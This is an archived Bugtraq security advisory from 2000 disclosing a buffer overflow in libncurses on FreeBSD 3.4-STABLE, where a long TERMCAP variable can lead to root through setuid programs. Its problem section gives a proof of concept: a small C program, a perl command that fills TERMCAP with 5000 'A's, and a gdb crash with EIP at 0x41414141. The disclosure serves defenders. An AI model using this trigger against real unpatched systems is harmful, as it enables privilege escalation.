Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

freebsd libncurses overflow

From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Mon, 24 Apr 2000 14:33:13 +0200

    _____________________________________________________________________
    b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 3
                        

                     Advisory Name: libncurses buffer overflow
                             Date: 24/4/00
                       Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
                           Vendor: FreeBSD Inc.
                              WWW: www.freebsd.org
                         Severity: setuid programs linked with libncurses
                                   can be exploited to obtain root access.
                           Author: venglin (venglin () freebsd lublin pl)
                         Homepage: www.b0f.com

 * Vulnerable Versions

        - 3.4-STABLE  -- vulnerable
        - 4.0-STABLE  -- not tested (probably *not* vulnerable)
        - 5.0-CURRENT -- *not* vulnerable

 * The Problem

lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }

lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
Previous By Date Next
Previous By Thread Next

Current thread: